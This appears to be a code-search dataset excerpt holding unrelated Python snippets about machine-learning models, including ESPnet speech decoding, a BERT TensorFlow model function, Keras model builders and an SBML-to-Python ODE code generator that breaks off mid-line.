model.lang2ph = json.load(f)\n\n model.lang2phid = {}\n for lang, phones in model.lang2ph.items(): \n phoneset = set(phones + ['<blank>', '<unk>', '<space>', '<eos>'])\n phoneset = phoneset.intersection(model.args.char_list)\n model.lang2phid[lang] = list(map(model.args.char_list.index, phoneset))\n # model.lang2phid[lang] = list(map(model.args.char_list.index, phones+['<blank>', '<unk>', '<space>', '<eos>']))\n \n model.ctc.lang2phid = model.lang2phid\n logging.warning(f'model lang2phid {model.lang2phid}')\n\n assert isinstance(model, ASRInterface)\n model.eval()\n\n load_inputs_and_targets = LoadInputsAndTargets(\n mode=\"asr\",\n load_output=False,\n sort_in_input_length=False,\n preprocess_conf=train_args.preprocess_conf\n if args.preprocess_conf is None\n else args.preprocess_conf,\n preprocess_args={\"train\": False},\n )\n logging.warning(f'args.rnnlm: {args.rnnlm}')\n\n if args.rnnlm:\n lm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)\n # NOTE: for a compatibility with less than 0.5.0 version models\n lm_model_module = getattr(lm_args, \"model_module\", \"default\")\n lm_class = dynamic_import_lm(lm_model_module, lm_args.backend)\n lm = lm_class(len(train_args.char_list), lm_args)\n torch_load(args.rnnlm, lm)\n lm.eval()\n else:\n lm = None\n\n if args.ngram_model:\n from espnet.nets.scorers.ngram import NgramFullScorer\n from espnet.nets.scorers.ngram import NgramPartScorer\n\n if args.ngram_scorer == \"full\":\n ngram = NgramFullScorer(args.ngram_model, train_args.char_list)\n else:\n ngram = NgramPartScorer(args.ngram_model, train_args.char_list)\n else:\n ngram = None\n\n scorers = model.scorers()\n \n scorers[\"lm\"] = lm\n scorers[\"ngram\"] = ngram\n scorers[\"length_bonus\"] = LengthBonus(len(train_args.char_list))\n weights = dict(\n decoder=1.0 - args.ctc_weight,\n ctc=args.ctc_weight,\n lm=args.lm_weight,\n ngram=args.ngram_weight,\n length_bonus=args.penalty,\n )\n beam_search = BeamSearch(\n 
beam_size=args.beam_size,\n vocab_size=len(train_args.char_list),\n weights=weights,\n scorers=scorers,\n sos=model.sos,\n eos=model.eos,\n token_list=train_args.char_list,\n pre_beam_score_key=None if args.ctc_weight == 1.0 else \"full\",\n )\n # TODO(karita): make all scorers batchfied\n if args.batchsize == 1:\n non_batch = [\n k\n for k, v in beam_search.full_scorers.items()\n if not isinstance(v, BatchScorerInterface)\n ]\n if len(non_batch) == 0:\n beam_search.__class__ = BatchBeamSearch\n logging.info(\"BatchBeamSearch implementation is selected.\")\n else:\n logging.warning(\n f\"As non-batch scorers {non_batch} are found, \"\n f\"fall back to non-batch implementation.\"\n )\n\n if args.ngpu > 1:\n raise NotImplementedError(\"only single GPU decoding is supported\")\n if args.ngpu == 1:\n device = \"cuda\"\n else:\n device = \"cpu\"\n dtype = getattr(torch, args.dtype)\n logging.info(f\"Decoding device={device}, dtype={dtype}\")\n model.to(device=device, dtype=dtype).eval()\n beam_search.to(device=device, dtype=dtype).eval()\n\n js = read_json_data(model.args, args.recog_json)\n # read json data\n # with open(args.recog_json, \"rb\") as f:\n # js = json.load(f)[\"utts\"]\n\n random.seed(args.seed)\n items = list(js.items())\n random.shuffle(items)\n js = OrderedDict(items[:args.recog_size])\n logging.warning(f'data json len {len(js)}')\n\n import re\n def get_lang(name):\n s = name.split('_')[0]\n s = re.sub(r'\\d+$', '', s.split('-')[0]) if re.search('[a-zA-Z]+', s) else s\n return s\n\n new_js = {}\n with torch.no_grad():\n for idx, name in enumerate(js.keys(), 1):\n logging.info(\"(%d/%d) decoding \" + name, idx, len(js.keys()))\n\n lang_labels = None\n lang_labels_for_masking = None\n if args.lang_label:\n lang_label = get_lang(name)\n if args.mask_phoneme:\n lang_labels_for_masking = [lang_label] # true lang labels\n if args.fake_lang_label:\n lang_labels = [args.fake_lang_label]\n\n batch = [(name, js[name])]\n feat = load_inputs_and_targets(batch)[0][0]\n enc = model.encode(torch.as_tensor(feat).to(device=device, dtype=dtype), lang_labels=lang_labels)\n\n nbest_hyps = beam_search(\n x=enc, maxlenratio=args.maxlenratio, minlenratio=args.minlenratio, \n mask_phoneme=args.mask_phoneme, lang_labels_for_masking=lang_labels_for_masking\n )\n\n nbest_hyps = [\n h.asdict() for h in nbest_hyps[: min(len(nbest_hyps), args.nbest)]\n ]\n new_js[name] = add_results_to_json(\n js[name], nbest_hyps, train_args.char_list\n )\n\n with open(args.result_label, \"wb\") as f:\n f.write(\n json.dumps(\n {\"utts\": new_js}, indent=4, ensure_ascii=False, sort_keys=True\n ).encode(\"utf_8\")\n )", "def models(r, model):\n\n\tif model==\"PREM\":\n\t\treturn model_prem(r)\n\n\telif model==\"PREM_iso\":\n\t\treturn model_prem_iso(r)\n\n\telif model==\"ONELAYER\":\n\t\treturn model_onelayer(r)\n\n\telif model==\"ONELAYER_pert\":\n\t\treturn model_onelayer_pert(r)\n\n\telif model==\"GUTENBERG\":\n\t\treturn model_gutenberg(r)", "def model_fn(features, labels, mode, params):\n # obtain the data\n _info('*** Features ***')\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n\n input_ids = features['input_ids'] # [batch_size, seq_length]\n input_mask = features['input_mask'] # [batch_size, seq_length]\n\n # if mode != tf.estimator.ModeKeys.PREDICT:\n # # segment_idx = features['segment_dis']\n # masked_lm_positions = features['masked_lm_positions'] # [batch_size, seq_length], specify the answer\n # masked_lm_ids = features['masked_lm_ids'] # 
[batch_size, answer_seq_length], specify the answer labels\n # masked_lm_weights = features['masked_lm_weights'] # [batch_size, seq_length], [1, 1, 0], 0 refers to the mask\n # # next_sentence_labels = features['next_sentence_labels']\n # else:\n masked_lm_positions = features['masked_lm_positions']\n masked_lm_ids = features['masked_lm_ids']\n masked_lm_weights = features['masked_lm_weights']\n\n if bert_config.train_type == 'seq2seq':\n _info('Training seq2seq task.')\n elif bert_config.train_type == 'lm':\n _info('Training language model task.')\n \n # build model\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n model = BertModel(\n config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask)\n \n # compute loss\n loss, per_loss, log_probs, logits = get_masked_lm_output(bert_config,\n model.get_sequence_output(),\n model.embedding_table,\n model.projection_table,\n masked_lm_positions,\n masked_lm_ids,\n masked_lm_weights,\n mode)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n masked_lm_predictions = tf.reshape(tf.argmax(log_probs, axis=-1, output_type=tf.int32), [-1])\n output_spec = tf.estimator.EstimatorSpec(mode, predictions=masked_lm_predictions)\n else:\n if mode == tf.estimator.ModeKeys.TRAIN: \n # restore from the checkpoint,\n # tf.estimator automatically restore from the model typically,\n # maybe here is for restore some pre-trained parameters\n tvars = tf.trainable_variables()\n initialized_variable_names = {}\n if init_checkpoint:\n (assignment_map, initialized_variable_names) = get_assignment_map_from_checkpoint(tvars, init_checkpoint)\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n _info('*** Trainable Variables ***')\n for var in tvars:\n init_string = ''\n if var.name in initialized_variable_names:\n init_string = ', *INIT_FROM_CKPT*'\n _info('name = {}, shape={}{}'.format(var.name, var.shape, init_string))\n \n train_op = optimization.create_optimizer(\n loss, bert_config.learning_rate, num_train_steps, bert_config.lr_limit)\n\n # learning_rate = tf.train.polynomial_decay(bert_config.learning_rate,\n # tf.train.get_or_create_global_step(),\n # num_train_steps,\n # end_learning_rate=0.0,\n # power=1.0,\n # cycle=False)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n # gradients = tf.gradients(loss, tvars, colocate_gradients_with_ops=True)\n # clipped_gradients, _ = tf.clip_by_global_norm(gradients, 5.0)\n # train_op = optimizer.apply_gradients(zip(clipped_gradients, tvars), global_step=tf.train.get_global_step())\n output_spec = tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n elif mode == tf.estimator.ModeKeys.EVAL:\n is_real_example = tf.ones(tf.shape(masked_lm_ids), dtype=tf.float32)\n \n def metric_fn(loss, label_ids, logits, is_real_example):\n \"\"\"\n Args:\n loss: tf.float32.\n label_ids: [b, s].\n logits: [b, s, v].\n \"\"\"\n # [b * s, v]\n logits = tf.reshape(logits, [-1, logits.shape[-1]])\n # [b * s, 1]\n predictions = tf.argmax(logits, axis=-1, output_type=tf.int32)\n # [b * s]\n label_ids = tf.reshape(label_ids, [-1])\n accuracy = tf.metrics.accuracy(\n labels=label_ids, predictions=predictions)\n loss = tf.metrics.mean(values=loss)\n return {'eval_accuracy': accuracy, 'eval_loss': loss}\n \n eval_metrics = metric_fn(loss, masked_lm_ids, logits, is_real_example)\n output_spec = tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metrics)\n\n return output_spec", "def model(self):\n\n # write summaries\n\n i = 
keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def model(self):\n\n # write summaries\n\n i = keras.Input(self.s)\n\n\n return keras.Model(inputs=[i], outputs=self.call(i))", "def __init__(self, model_name):\n\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems={}\n self.sentence_lengths={}\n self.endings={}\n self.total = 0", "def __init__(self, model, src_vocab, tgt_vocab):\n self.max_length = 120\n if torch.cuda.is_available():\n self.model = model.cuda()\n else:\n self.model = model.cpu()\n self.model.eval()\n self.src_vocab = src_vocab\n self.tgt_vocab = tgt_vocab", "def _build_model(self):\n raise NotImplementedError()", "def reconstruct_input_ext(self, model_in):", "def keras_model_fn(model_config, vocab_size, embedding_size, embeddings):\n ## hyperparams\n model_name = model_config['model_name']\n num_class = model_config['num_class']\n lstm_hs = model_config['lstm_hs']\n gru_hs = model_config['gru_hs']\n learning_rate = model_config['learning_rate']\n \n ## build model - , weights=[embeddings[1]]\n inputs = ks.Input(shape=(None,), dtype='int32', name='inputs')\n embedded_sequences_ft1 = layers.Embedding(vocab_size, embedding_size, trainable = True, mask_zero = False)(inputs)\n embedded_sequences_ft2 = layers.Embedding(vocab_size, embedding_size, trainable = True, mask_zero = False)(inputs)\n concat_embed = layers.concatenate([embedded_sequences_ft1 ,embedded_sequences_ft2])\n concat_embed = layers.SpatialDropout1D(0.5)(concat_embed)\n x = layers.Bidirectional(layers.CuDNNLSTM(lstm_hs, return_sequences = True))(concat_embed)\n x, x_h, x_c = layers.Bidirectional(layers.CuDNNGRU(gru_hs, return_sequences = True, return_state = True))(x)\n x_1 = layers.GlobalMaxPool1D()(x)\n x_2 = layers.GlobalAvgPool1D()(x)\n x_out = layers.concatenate([x_1 ,x_2, x_h])\n x_out = layers.BatchNormalization()(x_out)\n outputs = layers.Dense(num_class, activation = 'softmax', name = 'outputs')(x_out) # outputs\n model = ks.Model(inputs, outputs, name = model_name)\n \n ## compile\n model.compile(loss = 'categorical_crossentropy', \n optimizer = ks.optimizers.Adam(lr=learning_rate, clipnorm=.25, beta_1=0.7, beta_2=0.99), \n metrics = ['categorical_accuracy', ks.metrics.TopKCategoricalAccuracy(k=3)]) # metric what?\n return model", "def solve(self, model, sentence):\r\n if model == \"Simple\":\r\n return self.simple(sentence)\r\n elif model == \"Complex\":\r\n return self.complex(sentence)\r\n elif model == \"HMM\":\r\n return self.hmm(sentence)\r\n else:\r\n print(\"Unknown algorithm!\")", "def apply_model(gmm_model, speech_array):\n # given 1 speaker (1 file), figure out\n # assume that each time stamp's log-probs are INDEPENDENT\n return np.sum(gmm_model.score(speech_array))", "def model(self) -> str:\n ...", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.sentence_lengths = {}\n self.stems = {}\n self.commas_per_sentence = {}", "def GenerateModel(modelData, outputFilePath, objectName = 'SBMLmodel'):\n #The library mathFuncs serves to both only allow functions supported\n #functions in SBML/user defined functions, but also the python equivalent\n \n np.set_printoptions(threshold=sys.maxsize)\n \n \n \n outputFile = open(outputFilePath, \"w\")\n\n parameters = modelData.parameters\n compartments = modelData.compartments\n species = modelData.species\n reactions = modelData.reactions\n functions = modelData.functions\n \n assignmentRules = modelData.assignmentRules\n rateRules = 
modelData.rateRules\n initialAssignments = modelData.initialAssignments\n \n mathFuncs = {'abs' : 'abs',\n 'max' : 'max',\n 'min' : 'min',\n 'pow' : 'pow',\n 'exp' : 'math.exp',\n 'floor' : 'np.floor',\n 'ceiling' : 'math.ceil',\n 'exp' : 'math.exp',\n 'ln' : 'math.log',\n 'log' : 'math.log10',\n 'factorial' : 'math.factorial',\n 'sqrt' : 'math.sqrt',\n \n 'eq' : 'operator.eq',\n 'neq' : 'operator.ne',\n 'gt' : 'operator.gt',\n 'lt' : 'operator.lt',\n 'geq' : 'operator.ge',\n 'leq' : 'operator.le',\n \n 'and' : 'operator.and_',\n 'or' : 'operator.or_',\n 'xor' : 'operator.xor_',\n 'not' : 'operator.not_',\n \n 'sin' : 'np.sin',\n 'cos' : 'np.cos',\n 'tan' : 'np.tan',\n 'sec' : '1/np.cos',\n 'csc' : '1/np.sin',\n 'cot' : '1/np.tan',\n 'sinh' : 'np.sinh',\n 'cosh' : 'np.cosh',\n 'tanh' : 'np.tanh',\n 'sech' : '1/np.cosh',\n 'csch' : '1/np.sinh',\n 'coth' : '1/np.tanh',\n 'arcsin' : 'np.arcsin',\n 'arccos' : 'np.arccos',\n 'arctan' : 'np.arctan',\n 'arcsinh' : 'np.arcsinh',\n 'arccosh' : 'np.arccosh',\n 'arctanh' : 'np.arctanh',\n \n 'true' : 'True',\n 'false' : 'False',\n 'notanumber' : 'np.nan',\n 'pi' : 'np.pi',\n 'infinity' : 'np.inf',\n 'exponentiale' : 'np.e',\n 'piecewise' : 'Piecewise'\n } \n #Add in user defined functions\n# for function in functions:\n# mathFuncs[function] = \"self.\" + function\n\t\t\n #Set up stoichCoeffMat, a matrix of stoichiometric coefficients for solving the reactions\n reactantCounter = 0\n reactantIndex = {}\n reactionCounter = 0\n reactionIndex = {}\n \n rateRuleVars = []\n rateParams = 0\n for specie in species:\n reactantIndex[specie] = reactantCounter\n reactantCounter += 1\n for key, rateRule in rateRules.items():\n if rateRule.variable in parameters or rateRule.variable in compartments:\n rateParams += 1\n reactantIndex[rateRule.variable] = reactantCounter\n reactantCounter += 1\n rateRuleVars.append(rateRule.variable)\n elif rateRule.variable in species:\n pass\n else:\n raise Exception(\"Rate Rule adjusting something other than specie amount, parameter value, or compartment size.\")\n\n \t\t\n stoichCoeffMat = np.zeros([len(species) + rateParams, max(len(reactions),1)])\n \n for rxnId in reactions:\n reactionIndex[rxnId] = reactionCounter\n reactionCounter += 1\n reaction = reactions[rxnId]\n for reactant in reaction.reactants:\n if reactant[1] not in reactantIndex:\n reactantIndex[reactant[1]] = reactantCounter\n reactantCounter += 1\n if not (species[reactant[1]].isBoundarySpecies == \"True\"):\n stoichCoeffMat[reactantIndex[reactant[1]], reactionIndex[rxnId]] += reactant[0]\n\n \t\n # for reaction in reactions:\n # for reactant in reactions[reaction][0]:\n # if reactant[1] not in reactantIndex:\n # reactantIndex[reactant[1]] = reactantCounter\n # reactantCounter += 1\n # if not species[reactant[1]][4]:\n # stoichCoeffMat[reactantIndex[reactant[1]], reaction-1] += reactant[0]\n #print(rateParams)\n #print(stoichCoeffMat)\n \n outputFile.write(\"from sbmltopyode.SBMLModelClasses import *\\n\")\n outputFile.write(\"from scipy.integrate import odeint\\n\")\n outputFile.write(\"import numpy as np\\n\")\n outputFile.write(\"import operator\\n\")\n outputFile.write(\"import math\\n\\n\")\n \n outputFile.write(\"class \" + objectName +\":\\n\\n\")\n \n outputFile.write(\"\\tdef __init__(self):\\n\\n\")\n outputFile.write(\"\\t\\tself.p = {} #Dictionary of model parameters\\n\")\n for paramId in parameters:\n outputFile.write(\"\\t\\tself.p[\\'\" + paramId + \"\\'] = Parameter(\" + str(parameters[paramId].value)+ \", \\'\"+ paramId + \"\\', \" + 
str(parameters[paramId].isConstant) +\")\\n\")\n \n outputFile.write(\"\\n\\t\\tself.c = {} #Dictionary of compartments\\n\")\n for compartmentId in compartments:\n outputFile.write(\"\\t\\tself.c[\\'\" + compartmentId + \"\\'] = Compartment(\" + str(compartments[compartmentId].size) + \", \" + str(compartments[compartmentId].dimensionality)+ \", \" + str(compartments[compartmentId].isConstant) + \")\\n\")\n \n outputFile.write(\"\\n\\t\\tself.s = {} #Dictionary of chemical species\\n\")\n for speciesId in species:\n outputFile.write(\"\\t\\tspeciesMetadata = SBMLMetadata('\" + species[speciesId].name +\"')\\n\")\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\'] = Species(\" + str(species[speciesId].value) + \", '\" + species[speciesId].valueType + \"', self.c['\" + species[speciesId].compartment + \"'], \" + str(species[speciesId].hasOnlySubstanceUnits) + \", constant = \" + str(species[speciesId].isConstant) + \")\\n\")\n for key, rule in assignmentRules.items():\n if rule.variable == speciesId:\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\']._modifiedBy = \" + rule.Id + \"\\n\")\n for key, rule in rateRules.items():\n if rule.variable == speciesId:\n outputFile.write(\"\\t\\tself.s[\\'\" + speciesId + \"\\']._modifiedBy = \" + rule.Id + \"\\n\")\n \n \n outputFile.write(\"\\n\\t\\tself.r = {} #Dictionary of reactiions\\n\")\n for reactionId in reactions:\n outputFile.write(\"\\t\\tself.r[\\'\" + reactionId + \"\\'] = \" + reactionId + \"(self, SBMLMetadata('\" + reactions[reactionId].name + \"'))\\n\")\n \n outputFile.write(\"\\t\\tself.time = 0\\n\\n\")\n \n outputFile.write(\"\\t\\tself.reactionMetadata = {\")\n commaFlag = 0\n for reactionId in reactions:\n if commaFlag == 0:\n commaFlag = 1\n outputFile.write(\"\\n\\t\\t\")\n else:\n outputFile.write(\",\\n\\t\\t\")\n outputFile.write(\"self.Reaction\" + reactionId + \": SBMLMetadata('\" + reactions[reactionId].name + \"')\")\n outputFile.write(\"\\n\\t\\t}\\n\")\n \n outputFile.write('\\t\\tself.AssignmentRules()\\n\\n')\n \n outputFile.write(\"\\n\\n\")\n outputFile.write(\"\\tdef AssignmentRules(self):\\n\\n\")\n #These functions are defined here due to reading variables in the parent function's namespace\n #These are not intended to be used elsewhere\n def ParseLHS(rawLHS):\n returnLHS = ''\n if rawLHS in parameters:\n returnLHS = \"self.p[\\'\" + rawLHS + \"\\'].value = \"\n elif rawLHS in species:\n if not species[rawLHS].hasOnlySubstanceUnits: \n returnLHS = 'self.s[\\'' + rawLHS + '\\'].concentration = '\n else: \n returnLHS = 'self.s[\\'' + rawLHS + '\\'].amount = '\n elif rawLHS in compartments:\n returnLHS = 'self.c[\\'' + rawLHS + '\\'].size = '\n else:\n raise(Exception(\"New case: rule LHS not in p: \" + rawLHS))\n\n return returnLHS\n\t\n def ParseRHS(rawRHS, extendedParams = [], objectText = \"self\"):\n #objectText is not \"self\" when parsing reaction math\n \n #The main purpose of this function is to turn math strings given by libSBML into\n #code formated to properly call members of the resulting class\n #For example k_1*C_A may turn to\n \n \n rawRHS = rawRHS.replace(\"^\", \"**\") #Replaces carrot notation for exponentiation with ** operator\n variables = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', rawRHS): #look for variable names\n #ToDo: check for function calls\n variables.append([rawRHS[match.start():match.end()], match.span()])\n \n #rule[1] contains the right hand side\n returnRHS = ''\n oldSpan = None\n if variables != []:\n for variable in variables:\n if oldSpan == None 
and variable[1][0] != 0:\n returnRHS += rawRHS[0:variable[1][0]]\n elif oldSpan != None:\n returnRHS += rawRHS[oldSpan[1]:variable[1][0]]\n oldSpan = variable[1]\n if variable[0] in parameters:\n returnRHS += objectText + '.p[\\'' + variable[0] + '\\'].value'\n elif variable[0] in species:\n if not species[variable[0]].hasOnlySubstanceUnits == \"True\": \n returnRHS += objectText + '.s[\\'' + variable[0] + '\\'].concentration'\n else: \n returnRHS += objectText + '.s[\\'' + variable[0] + '\\'].amount'\n elif variable[0] in compartments:\n returnRHS += objectText + '.c[\\'' + variable[0] + '\\'].size'\n elif variable[0] in mathFuncs:\n returnRHS += mathFuncs[variable[0]]\n elif variable[0] in functions:\n returnRHS += objectText + '.' + variable[0]\n elif variable[0] in extendedParams:\n if objectText == \"self\":\n returnRHS += variable[0]\n else:\n returnRHS += \"self.p[\\'\" + variable[0] + \"\\'].value\"\n\n elif variable[0] == \"time\":\n returnRHS += objectText + '.time'\n elif variable[0] == \"pi\":\n returnRHS += \"np.pi\"\n else:\n raise(Exception('New case: unkown RHS variable: ' + variable[0]))\n returnRHS += rawRHS[variable[1][1]:len(rawRHS)]\n # print(rule[1][variable[1][1]])\n #print(rule[1][-1])\n else:\n returnRHS = rawRHS\n\t\t\n return returnRHS\n\n ruleDefinedVars = [rule.variable for rule in assignmentRules.values()]\n for key, assignment in initialAssignments.items():\n ruleDefinedVars.append(assignment.variable)\n \n for key, rule in assignmentRules.items():\n rule.dependents = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', rule.math): #look for variable names\n rule.dependents.append(rule.math[match.start():match.end()])\n originalLen = len(rule.dependents)\n for i in range(originalLen):\n if rule.dependents[originalLen - i -1] not in ruleDefinedVars:\n rule.dependents.pop(originalLen- i-1)\n \n for key, assignment in initialAssignments.items():\n assignment.dependents = []\n for match in re.finditer(r'\\b[a-zA-Z_]\\w*', assignment.math): #look for variable names\n assignment.dependents.append(assignment.math[match.start():match.end()])\n originalLen = len(assignment.dependents)\n for i in range(originalLen):\n if assignment.dependents[originalLen - i -1] not in ruleDefinedVars :\n assignment.dependents.pop(originalLen- i-1)\n \n# breakVar = False\n while True:\n continueVar = False\n breakVar = True\n varDefinedThisLoop = None\n for key, rule in assignmentRules.items():\n if rule.dependents == []:\n ruleLHS = ParseLHS(rule.variable)\n ruleRHS = ParseRHS(rule.math)\n outputFile.write(\"\\t\\t\" + ruleLHS + ruleRHS + '\\n\\n')\n varDefinedThisLoop = rule.variable\n rule.dependents = None\n continueVar = True\n breakVar = False\n break\n elif not rule.dependents == None:\n breakVar = False\n \n if not continueVar:\n for key, assignment in initialAssignments.items():\n if assignment.dependents == []:\n assignmentLHS = ParseLHS(assignment.variable)\n assignmentRHS = ParseRHS(assignment.math)\n outputFile.write(\"\\t\\tif self.time <= 0 :\\n\")\n if assignment.variable in parameters:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.p['\" + assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.p['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.p['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n elif assignment.variable in species:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.s['\" + 
assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.s['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.s['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n elif assignment.variable in compartment:\n outputFile.write(\"\\t\\t\\tisConstantValue = self.c['\" + assignment.variable + \"']._constant\\n\")\n outputFile.write(\"\\t\\t\\tself.c['\" + assignment.variable + \"']._constant = False\\n\")\n outputFile.write(\"\\t\\t\\t\" + assignmentLHS + assignmentRHS + '\\n')\n outputFile.write(\"\\t\\t\\tself.c['\" + assignment.variable + \"']._constant = isConstantValue\\n\\n\")\n \n varDefinedThisLoop = assignment.variable\n assignment.dependents = None\n continueVar = True\n breakVar = False\n break\n elif not rule.dependents == None:\n breakVar = False\n \n for rule in assignmentRules.values():\n if not rule.dependents == None:\n originalLen = len(rule.dependents)\n for i in range(originalLen):\n if rule.dependents[originalLen - i -1] == varDefinedThisLoop:\n rule.dependents.pop(originalLen - i -1)\n# print(rule.variable + ':' + str(rule.dependents))\n\n for assignment in initialAssignments.values():\n if not assignment.dependents == None:\n originalLen = len(assignment.dependents)\n for i in range(originalLen):\n if assignment.dependents[originalLen - i - 1] == varDefinedThisLoop:\n assignment.dependents.pop(originalLen - i - 1)\n# print(assignment.variable + ':' + str(assignment.dependents))\n \n if continueVar:\n continue\n elif breakVar:\n break\n else:\n raise Exception('Algebraic Loop in AssignmentRules')\n \n outputFile.write(\"\\t\\treturn\\n\\n\")\n \n for functionId in functions:\n arguments = functions[functionId].arguments\n argumentString = \"\"\n for i in range(len(arguments)):\n argumentString += arguments[i]\n if i != len(arguments) - 1:\n argumentString += \", \"\n \n outputFile.write(\"\\tdef \" + functionId + \"(self, \" + argumentString + \"):\\n\")\n outputFile.write(\"\\t\\treturn \" + functions[functionId].mathString.replace(\"^\", \"**\") + \"\\n\")\n \n for reactionId in reactions:\n outputFile.write(\"\\tdef Reaction\" + str(reactionId) + \"(self):\\n\\n\")\n\n rxnParameters = []\n for param in reactions[reactionId].rxnParameters:\n outputFile.write(\"\\t\\t\" + param[0] + \" = \" + str(param[1]) + \"\\n\")\n rxnParameters.append(param[0])\n\t\t\t\n rateLaw = ParseRHS(reactions[reactionId].rateLaw, rxnParameters)\n \n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n\n rateRuleLHSVars = []\n for key, rateRule in rateRules.items():\n rateRuleLHSVars.append(rateRule.variable)\n outputFile.write(\"\\tdef Rate\" + rateRule.variable + \"(self):\\n\\n\")\n rateLaw = ParseRHS(rateRule.math)\n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n \n yArray = ''\n i = 0\n yArrayVars = [0 for x in range(len(species) + rateParams)]\n for variable, index in reactantIndex.items():\n yArrayVars[index] = variable\n \n for index in range(len(yArrayVars)):\n # print(yArrayVars[index])\n if index != 0:\n yArray += ', '\n \n if yArrayVars[index] in species:\n yArray += 'self.s[\\'' + yArrayVars[index] + '\\'].amount'\n continue\n \n if yArrayVars[index] in parameters:\n yArray += 'self.p[\\'' + yArrayVars[index] + '\\'].value'\n continue\n \n if yArrayVars[index] in compartments:\n yArray += 'self.c\\'' + yArrayVars[index] + '\\'].size'\n continue\n \n\n \n outputFile.write('\\tdef _SolveReactions(self, y, 
t):\\n\\n')\n outputFile.write('\\t\\tself.time = t\\n')\n outputFile.write('\\t\\t' + yArray + ' = y\\n')\n outputFile.write('\\t\\tself.AssignmentRules()\\n\\n')\n# outputFile.write('\\t\\t[self.s[speciesId].UpdateCompartmentSizeMember() for speciesId in self.s]\\n')\n rateArray = '[ '\n i = 0\n rateArrayVars = [0 for x in range(len(species) + rateParams)]\n \n for variable, index in reactantIndex.items():\n if variable in rateRuleLHSVars:\n rateArrayVars[index] = variable\n \n\n \n for variable in rateArrayVars:\n if i != 0:\n rateArray += ', '\n i += 1\n if variable == 0:\n rateArray += '0'\n else:\n rateArray += 'self.Rate' + variable + '()'\n \n \n \n \n rateArray += ']'\n outputFile.write('\\t\\trateRuleVector = np.array(' + str(rateArray) + ', dtype = np.float64)\\n\\n') \n \n outputFile.write('\\t\\tstoichiometricMatrix = np.array(' + re.sub('\\n,', ',\\n\\t\\t\\t\\t\\t', re.sub('[^[] +', ',' ,str(stoichCoeffMat))) + ', dtype = np.float64)\\n\\n')\n outputFile.write('\\t\\treactionVelocities = np.array([')\n reactionElements = ''\n if reactions:\n for reactionId in reactions:\n if reactionElements == '':\n reactionElements += ('self.r[\\'' + str(reactionId) + '\\']()')\n else:\n reactionElements += (', self.r[\\'' + str(reactionId) + '\\']()')\n else:\n reactionElements = '0'\n outputFile.write(reactionElements + '], dtype = np.float64)\\n\\n')\n outputFile.write('\\t\\trateOfSpeciesChange = stoichiometricMatrix @ reactionVelocities + rateRuleVector\\n\\n')\n outputFile.write('\\t\\treturn rateOfSpeciesChange\\n\\n')\n \n outputFile.write('\\tdef RunSimulation(self, deltaT, absoluteTolerance = 1e-12, relativeTolerance = 1e-6):\\n\\n')\n \n outputFile.write('\\t\\tfinalTime = self.time + deltaT\\n')\n outputFile.write('\\t\\ty0 = np.array([' + yArray + '], dtype = np.float64)\\n')\n outputFile.write('\\t\\t' + yArray + ' = odeint(self._SolveReactions, y0, [self.time, finalTime], atol = absoluteTolerance, rtol = relativeTolerance, mxstep=5000000)[-1]\\n')\n outputFile.write('\\t\\tself.time = finalTime\\n')\n outputFile.write('\\t\\tself.AssignmentRules()\\n')\n# outputFile.write('\\t\\t[self.s[speciesId].UpdateCompartmentSizeMember() for speciesId in self.s]\\n')\n outputFile.write('\\n')\n \n for key in reactions.keys():\n outputFile.write('class ' + key + ':\\n\\n')\n outputFile.write('\\tdef __init__(self, parent, metadata = None):\\n\\n')\n outputFile.write('\\t\\tself.parent = parent\\n')\n outputFile.write('\\t\\tself.p = {}\\n')\n outputFile.write('\\t\\tself.metadata = metadata\\n\\n')\n for param in reactions[key].rxnParameters:\n outputFile.write(\"\\t\\tself.p[\\'\" + param[0] + \"\\'] = Parameter(\" + str(param[1]) + \", '\" + param[0] + \"')\\n\")\n #\"\\t\\tself.p[\\'\" + paramId + \"\\'] = Parameter(\" + str(parameters[paramId].value)+ \", \"+ paramId + \", \" + str(parameters[paramId].isConstant) +\")\\n\"\n \n outputFile.write('\\n\\tdef __call__(self):\\n')\n# print(key)\n# print(reactions[key].rxnParameters)\n rxnParamNames = [param[0] for param in reactions[key].rxnParameters]\n rateLaw = ParseRHS(reactions[key].rateLaw, rxnParamNames, \"self.parent\")\n outputFile.write('\\t\\treturn ' + rateLaw + '\\n\\n')\n\n \n for key in functions.keys():\n outputFile.write('class ' + key + ':\\n\\n')\n outputFile.write('\\tdef __init__(self, parent, metadata = None):\\n\\n')\n outputFile.write('\\t\\tself.parent = parent\\n')\n outputFile.write('\\t\\tself.metadata = metadata\\n\\n')\n\n arguments = functions[key].arguments\n argumentString = \"\"\n for i in 
